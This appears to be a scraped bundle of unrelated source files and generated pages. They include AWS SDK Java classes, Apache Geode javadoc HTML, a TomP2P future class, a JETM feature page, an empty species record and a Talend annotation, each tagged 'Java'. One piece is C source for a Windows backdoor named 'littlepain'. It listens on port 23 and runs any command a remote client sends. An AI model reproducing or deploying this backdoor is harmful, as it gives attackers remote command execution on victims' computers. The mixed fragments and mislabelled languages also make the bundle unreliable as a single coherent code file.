        if (other.getSchemaChangePolicy() != null && other.getSchemaChangePolicy().equals(this.getSchemaChangePolicy()) == false)
            return false;
        if (other.getRecrawlPolicy() == null ^ this.getRecrawlPolicy() == null)
            return false;
        if (other.getRecrawlPolicy() != null && other.getRecrawlPolicy().equals(this.getRecrawlPolicy()) == false)
            return false;
        if (other.getLineageConfiguration() == null ^ this.getLineageConfiguration() == null)
            return false;
        if (other.getLineageConfiguration() != null && other.getLineageConfiguration().equals(this.getLineageConfiguration()) == false)
            return false;
        if (other.getLakeFormationConfiguration() == null ^ this.getLakeFormationConfiguration() == null)
            return false;
        if (other.getLakeFormationConfiguration() != null && other.getLakeFormationConfiguration().equals(this.getLakeFormationConfiguration()) == false)
            return false;
        if (other.getConfiguration() == null ^ this.getConfiguration() == null)
            return false;
        if (other.getConfiguration() != null && other.getConfiguration().equals(this.getConfiguration()) == false)
            return false;
        if (other.getCrawlerSecurityConfiguration() == null ^ this.getCrawlerSecurityConfiguration() == null)
            return false;
        if (other.getCrawlerSecurityConfiguration() != null && other.getCrawlerSecurityConfiguration().equals(this.getCrawlerSecurityConfiguration()) == false)
            return false;
        if (other.getTags() == null ^ this.getTags() == null)
            return false;
        if (other.getTags() != null && other.getTags().equals(this.getTags()) == false)
            return false;
        return true;
    }

    @Override
    public int hashCode() {
        final int prime = 31;
        int hashCode = 1;

        hashCode = prime * hashCode + ((getName() == null) ? 0 : getName().hashCode());
        hashCode = prime * hashCode + ((getRole() == null) ? 0 : getRole().hashCode());
        hashCode = prime * hashCode + ((getDatabaseName() == null) ? 0 : getDatabaseName().hashCode());
        hashCode = prime * hashCode + ((getDescription() == null) ? 0 : getDescription().hashCode());
        hashCode = prime * hashCode + ((getTargets() == null) ? 0 : getTargets().hashCode());
        hashCode = prime * hashCode + ((getSchedule() == null) ? 0 : getSchedule().hashCode());
        hashCode = prime * hashCode + ((getClassifiers() == null) ? 0 : getClassifiers().hashCode());
        hashCode = prime * hashCode + ((getTablePrefix() == null) ? 0 : getTablePrefix().hashCode());
        hashCode = prime * hashCode + ((getSchemaChangePolicy() == null) ? 0 : getSchemaChangePolicy().hashCode());
        hashCode = prime * hashCode + ((getRecrawlPolicy() == null) ? 0 : getRecrawlPolicy().hashCode());
        hashCode = prime * hashCode + ((getLineageConfiguration() == null) ? 0 : getLineageConfiguration().hashCode());
        hashCode = prime * hashCode + ((getLakeFormationConfiguration() == null) ? 0 : getLakeFormationConfiguration().hashCode());
        hashCode = prime * hashCode + ((getConfiguration() == null) ? 0 : getConfiguration().hashCode());
        hashCode = prime * hashCode + ((getCrawlerSecurityConfiguration() == null) ? 0 : getCrawlerSecurityConfiguration().hashCode());
        hashCode = prime * hashCode + ((getTags() == null) ? 0 : getTags().hashCode());
        return hashCode;
    }

    @Override
    public CreateCrawlerRequest clone() {
        return (CreateCrawlerRequest) super.clone();
    }

}
Java
/* * Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.cloudwatch.model.transform; import javax.annotation.Generated; import com.amazonaws.SdkClientException; import com.amazonaws.Request; import com.amazonaws.DefaultRequest; import com.amazonaws.http.HttpMethodName; import com.amazonaws.services.cloudwatch.model.*; import com.amazonaws.transform.Marshaller; import com.amazonaws.util.StringUtils; /** * ListDashboardsRequest Marshaller */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class ListDashboardsRequestMarshaller implements Marshaller<Request<ListDashboardsRequest>, ListDashboardsRequest> { public Request<ListDashboardsRequest> marshall(ListDashboardsRequest listDashboardsRequest) { if (listDashboardsRequest == null) { throw new SdkClientException("Invalid argument passed to marshall(...)"); } Request<ListDashboardsRequest> request = new DefaultRequest<ListDashboardsRequest>(listDashboardsRequest, "AmazonCloudWatch"); request.addParameter("Action", "ListDashboards"); request.addParameter("Version", "2010-08-01"); request.setHttpMethod(HttpMethodName.POST); if (listDashboardsRequest.getDashboardNamePrefix() != null) { request.addParameter("DashboardNamePrefix", StringUtils.fromString(listDashboardsRequest.getDashboardNamePrefix())); } if (listDashboardsRequest.getNextToken() != null) { request.addParameter("NextToken", StringUtils.fromString(listDashboardsRequest.getNextToken())); } return request; } }
Java
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_66-internal) on Wed Apr 13 11:47:04 PDT 2016 --> <title>ManagementException (Apache Geode 1.0.0-incubating.M2)</title> <meta name="date" content="2016-04-13"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="ManagementException (Apache Geode 1.0.0-incubating.M2)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../com/gemstone/gemfire/management/LockServiceMXBean.html" title="interface in com.gemstone.gemfire.management"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../com/gemstone/gemfire/management/ManagementService.html" title="class in com.gemstone.gemfire.management"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a 
href="../../../../index.html?com/gemstone/gemfire/management/ManagementException.html" target="_top">Frames</a></li> <li><a href="ManagementException.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#methods.inherited.from.class.com.gemstone.gemfire.GemFireException">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li>Method</li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">com.gemstone.gemfire.management</div> <h2 title="Class ManagementException" class="title">Class ManagementException</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>java.lang.Throwable</li> <li> <ul class="inheritance"> <li>java.lang.Exception</li> <li> <ul class="inheritance"> <li>java.lang.RuntimeException</li> <li> <ul class="inheritance"> <li><a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">com.gemstone.gemfire.GemFireException</a></li> <li> <ul class="inheritance"> <li>com.gemstone.gemfire.management.ManagementException</li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li 
class="blockList"> <dl> <dt>All Implemented Interfaces:</dt> <dd>java.io.Serializable</dd> </dl> <dl> <dt>Direct Known Subclasses:</dt> <dd><a href="../../../../com/gemstone/gemfire/management/AlreadyRunningException.html" title="class in com.gemstone.gemfire.management">AlreadyRunningException</a></dd> </dl> <hr> <br> <pre>public class <span class="typeNameLabel">ManagementException</span> extends <a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">GemFireException</a></pre> <div class="block">A <code>ManagementException</code> is a general exception that may be thrown when any administration or monitoring operation on a GemFire component fails. Various management and monitoring exceptions are wrapped in <code>ManagementException</code>s.</div> <dl> <dt><span class="simpleTagLabel">Since:</span></dt> <dd>7.0</dd> <dt><span class="seeLabel">See Also:</span></dt> <dd><a href="../../../../serialized-form.html#com.gemstone.gemfire.management.ManagementException">Serialized Form</a></dd> </dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException--">ManagementException</a></span>()</code> <div class="block">Constructs a new exception with a <code>null</code> detail message.</div> </td> </tr> <tr class="rowColor"> <td class="colOne"><code><span
class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.String-">ManagementException</a></span>(java.lang.String&nbsp;message)</code> <div class="block">Constructs a new exception with the specified detail message.</div> </td> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.String-java.lang.Throwable-">ManagementException</a></span>(java.lang.String&nbsp;message, java.lang.Throwable&nbsp;cause)</code> <div class="block">Constructs a new ManagementException with the specified detail message and cause.</div> </td> </tr> <tr class="rowColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../com/gemstone/gemfire/management/ManagementException.html#ManagementException-java.lang.Throwable-">ManagementException</a></span>(java.lang.Throwable&nbsp;cause)</code> <div class="block">Constructs a new ManagementException by wrapping the specified cause.</div> </td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.com.gemstone.gemfire.GemFireException"> <!-- --> </a> <h3>Methods inherited from class&nbsp;com.gemstone.gemfire.<a href="../../../../com/gemstone/gemfire/GemFireException.html" title="class in com.gemstone.gemfire">GemFireException</a></h3> <code><a href="../../../../com/gemstone/gemfire/GemFireException.html#getRootCause--">getRootCause</a></code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Throwable"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Throwable</h3> <code>addSuppressed, fillInStackTrace, getCause, getLocalizedMessage, 
getMessage, getStackTrace, getSuppressed, initCause, printStackTrace, printStackTrace, printStackTrace, setStackTrace, toString</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="ManagementException--"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>ManagementException</h4> <pre>public&nbsp;ManagementException()</pre> <div class="block">Constructs a new exception with a <code>null</code> detail message. The cause is not initialized, and may subsequently be initialized by a call to <code>Throwable.initCause(java.lang.Throwable)</code>.</div> </li> </ul> <a name="ManagementException-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>ManagementException</h4> <pre>public&nbsp;ManagementException(java.lang.String&nbsp;message)</pre> <div class="block">Constructs a new exception with the specified detail message. 
The cause is not initialized and may subsequently be initialized by a call to <code>Throwable.initCause(java.lang.Throwable)</code>.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>message</code> - The detail message.</dd> </dl> </li> </ul> <a name="ManagementException-java.lang.String-java.lang.Throwable-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>ManagementException</h4> <pre>public&nbsp;ManagementException(java.lang.String&nbsp;message, java.lang.Throwable&nbsp;cause)</pre> <div class="block">Constructs a new ManagementException with the specified detail message and cause. <p> Note that the detail message associated with <code>cause</code> is <i>not</i> automatically incorporated in this runtime exception's detail message.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>message</code> - The detail message.</dd> <dd><code>cause</code> - The cause of this exception or <code>null</code> if the cause is unknown.</dd> </dl> </li> </ul> <a name="ManagementException-java.lang.Throwable-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>ManagementException</h4> <pre>public&nbsp;ManagementException(java.lang.Throwable&nbsp;cause)</pre> <div class="block">Constructs a new ManagementException by wrapping the specified cause. 
The detail for this exception will be null if the cause is null or cause.toString() if a cause is provided.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>cause</code> - The cause of this exception or <code>null</code> if the cause is unknown.</dd> </dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../com/gemstone/gemfire/management/LockServiceMXBean.html" title="interface in com.gemstone.gemfire.management"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../com/gemstone/gemfire/management/ManagementService.html" title="class in com.gemstone.gemfire.management"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?com/gemstone/gemfire/management/ManagementException.html" target="_top">Frames</a></li> <li><a href="ManagementException.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) 
{ allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#methods.inherited.from.class.com.gemstone.gemfire.GemFireException">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li>Method</li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
Java
/* * Copyright 2013 Thomas Bocek * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package net.tomp2p.futures; /** * A generic future that can be used to set a future to complete with an attachment. * * @author Thomas Bocek * * @param <K> */ public class FutureDone<K> extends BaseFutureImpl<FutureDone<K>> { public static FutureDone<Void> SUCCESS = new FutureDone<Void>().done(); private K object; /** * Creates a new future for the shutdown operation. */ public FutureDone() { self(this); } /** * Set future as finished and notify listeners. * * @return This class */ public FutureDone<K> done() { done(null); return this; } /** * Set future as finished and notify listeners. * * @param object * An object that can be attached. * @return This class */ public FutureDone<K> done(final K object) { synchronized (lock) { if (!completedAndNotify()) { return this; } this.object = object; this.type = BaseFuture.FutureType.OK; } notifyListeners(); return this; } /** * @return The attached object */ public K object() { synchronized (lock) { return object; } } }
Java
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"/> <title>Java(TM) Execution Time Measurement Library</title> <link rel="stylesheet" type="text/css" href="default.css"/> </head> <body> <div class="menu"> <a href="index.html">Home</a> | <a href="doc.html"><b>Documentation</b></a> | <a href="faq.html">FAQ</a> | <a href="../api/index.html">JavaDoc</a> | <a href="files.html"><b>Download</b></a> | <a href="svn.html">SVN</a> | <a href="http://sourceforge.net/mail/?group_id=109626">Mailing Lists</a> | <a href="http://sourceforge.net/projects/jetm/">Sourceforge Project Page</a> </div> <div id="content"> <div id="header">Java&trade; Execution Time Measurement Library</div> <div id="subheader">Runtime performance monitoring made easy</div> <div id="main"> <h3>JETM Featureset</h3> <p> Obviously the best way to explore JETM features is looking at the <a href="http://jetm.void.fm/jetm-demo/">online demo application</a>. Nevertheless this page lists the current JETM feature set. 
</p> <h4>JETM Core Features</h4> <ul> <li>Declarative and programmatic performance monitoring</li> <li>Flat and nested (tree-based) recording</li> <li>Low overhead - can and <b>should</b> be used in production</li> <li>Pluggable result visualization including HTML, Swing and Standard Out</li> <li>Simple setup and integration</li> <li>No VM level instrumentation requirement, JETM can and should be used per deployment unit</li> <li>Persistent performance results</li> </ul> <h4>Supported JDKs (tested, but not limited to)</h4> <ul> <li>Sun JDK 1.3, 1.4, 5.0, 6.0</li> <li>Bea JRockit</li> </ul> <h4>Supported timers</h4> <ul> <li>java.lang.System#nanoTime</li> <li>sun.misc.Perf</li> <li>java.lang.System#currentTimeMillis()</li> </ul> <h4>Framework integrations</h4> <ul> <li>Declarative performance monitoring using <a href="howto/spring_integration.html">Springframework</a> AOP, <a href="howto/aspectwerkz_integration.html">AspectWerkz</a> and other AOP Alliance Frameworks </li> <li>Build-in <a href="howto/drop-in-console.html">HTTP Server</a> for performance monitoring</li> <li>Raw Data Logging using <a href="http://logging.apache.org/log4j">Log4J</a>, <a href="http://jakarta.apache.org/commons/logging/">commons-logging</a> and <i>java.util.logging</i></li> <li>Result visualization using <a href="http://rrd4j.dev.java.net/">RRD4j</a></li> <li>Simple JMX Integration</li> </ul> </div> </div> <div class="menu"> <a href="index.html">Home</a> | <a href="doc.html"><b>Documentation</b></a> | <a href="faq.html">FAQ</a> | <a href="../api/index.html">JavaDoc</a> | <a href="files.html"><b>Download</b></a> | <a href="svn.html">SVN</a> | <a href="http://sourceforge.net/mail/?group_id=109626">Mailing Lists</a> | <a href="http://sourceforge.net/projects/jetm/">Sourceforge Project Page</a> </div> </body> <!-- Last modified $Date: 2007-07-08 23:23:02 +0200 (So, 08 Jul 2007) $ --> </html>
Java
# Manglietia dolichogyna Dandy ex Noot. SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
#include "littlepain.h" /* the backdoor :) */ DWORD WINAPI BackDoor(LPVOID Data) { SOCKET server_sock,client_sock; struct sockaddr_in serv_inf; struct timeval tv; fd_set ft; char exec[MAX_PATH]; DWORD cnt; STARTUPINFO inf_prog; PROCESS_INFORMATION info_pr; if((server_sock = socket(AF_INET,SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { return 0; } serv_inf.sin_family = AF_INET; serv_inf.sin_addr.s_addr = htonl(INADDR_ANY); serv_inf.sin_port = htons(23); if(bind(server_sock,(struct sockaddr *)&serv_inf, sizeof(struct sockaddr_in)) == SOCKET_ERROR) { return 0; } listen(server_sock,SOMAXCONN); /* main loop! */ while(1) { client_sock = accept(server_sock,NULL,0); tv.tv_usec = 0; tv.tv_sec = 60; FD_ZERO(&ft); FD_SET(client_sock,&ft); /* send a msg */ send(client_sock,"[:: littlepain ::] by WarGame\r\n",31,0); while(1) { if(select(client_sock+1,&ft,NULL,NULL,&tv) > 0) { memset(exec,0,MAX_PATH); recv(client_sock,exec,MAX_PATH,0); /* remove "\r" and "\n" */ for(cnt = 0;cnt < strlen(exec);cnt++) { if(exec[cnt] == '\r' || exec[cnt] == '\n') { exec[cnt] = 0; } } /* (try to) execute the command */ memset(&inf_prog,0,sizeof(STARTUPINFO)); memset(&info_pr,0,sizeof(PROCESS_INFORMATION)); inf_prog.cb = sizeof(STARTUPINFO); inf_prog.dwFlags = STARTF_USESHOWWINDOW; inf_prog.wShowWindow = SW_SHOW; if(CreateProcess(NULL,exec,NULL,NULL,FALSE,CREATE_NEW_CONSOLE, NULL,NULL,&inf_prog,&info_pr)) { send(client_sock,"Executed!\r\n",11,0); } else { send(client_sock,"Not Executed!\r\n",15,0); } } else { closesocket(client_sock); break; } } } }
Java
/**
 * Copyright (C) 2006-2020 Talend Inc. - www.talend.com
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.talend.sdk.component.api.configuration.constraint;

import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
import java.util.Collection;

import org.talend.sdk.component.api.configuration.constraint.meta.Validation;
import org.talend.sdk.component.api.meta.Documentation;

/**
 * Marks a collection option whose elements must all be distinct
 * (set-like semantics), enforced by the "uniqueItems" validation.
 */
@Target({ ElementType.FIELD, ElementType.PARAMETER })
@Retention(RetentionPolicy.RUNTIME)
@Validation(expectedTypes = Collection.class, name = "uniqueItems")
@Documentation("Ensure the elements of the collection must be distinct (kind of set).")
public @interface Uniques {
}
Java